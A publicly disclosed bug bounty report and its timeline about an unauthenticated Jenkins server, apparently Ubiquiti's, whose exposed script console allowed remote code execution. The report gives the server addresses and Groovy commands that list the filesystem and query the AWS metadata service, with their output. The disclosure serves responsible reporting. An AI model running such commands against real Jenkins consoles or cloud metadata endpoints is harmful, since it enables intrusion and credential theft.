Public Jenkins instance with /script enabled
State Resolved (Closed)
Disclosed publicly 2018-09-10T16:21:17.097Z
Reported To
Weakness Code Injection
Bounty $2,500
Collapse
Summary by smiegles

Ubiquiti exposed a Jenkins server on the internet without any authentication, this allowed me to reach the AWS metadata service and execute code on the server itself. They resolved the issue and rewarded a bounty within 30 minutes of reporting, really impressive.


Timeline
submitted a report to Ubiquiti Networks .
2018-08-31T12:05:04.584Z

Hi,

First of all. I'm not 100% able to verify that this server is actually owned by Ubnt as there are multiple DNS Name's in the SSL certificate.

DNS Name: *.uum.com
DNS Name: *.ubnt.com
DNS Name: *.svc.ubnt.com
DNS Name: *.api.uum.com
DNS Name: *.svc.uum.com
DNS Name: uum.com

So, the server hosted on https://54.191.232.223/and https://54.186.253.37/is reachable from the internet and has the scirpt console enabled.

You can execute code on it by going to: https://54.186.253.37/script and insert the following code:

"ls /".execute().text

result

Result: bin
boot
dev
docker-java-home
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

It also allows reaching the AWS metadata server:

"curl http://169.254.169.254/latest/meta-data/".execute().text

Result

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/

Impact

RCE


Regards,
Frans

ubnt-rubens Activities::BugTriaged
2018-08-31T12:21:45.431Z
This server was intended to be used for test and with dummy data. Although it didn't contain any information and was not part of any UBNT system it was wrongly exposed to the internet.


Activities::BountyAwarded
2018-08-31T12:22:13.945Z


ubnt-rubens Activities::BugResolved
2018-08-31T12:22:27.990Z
Thank you and good luck with future bug hunting.


smiegles Activities::Comment
2018-08-31T12:23:54.572Z
Thank you for the ridiculous fast response and bounty!


smiegles Activities::AgreedOnGoingPublic
2018-09-08T23:40:55.218Z
Totally up to you but I felt like this was a great example of how bug bounties should be done.


ubnt-rubens Activities::AgreedOnGoingPublic
2018-09-10T16:21:16.930Z


ubnt-rubens Activities::ReportBecamePublic
2018-09-10T16:21:17.154Z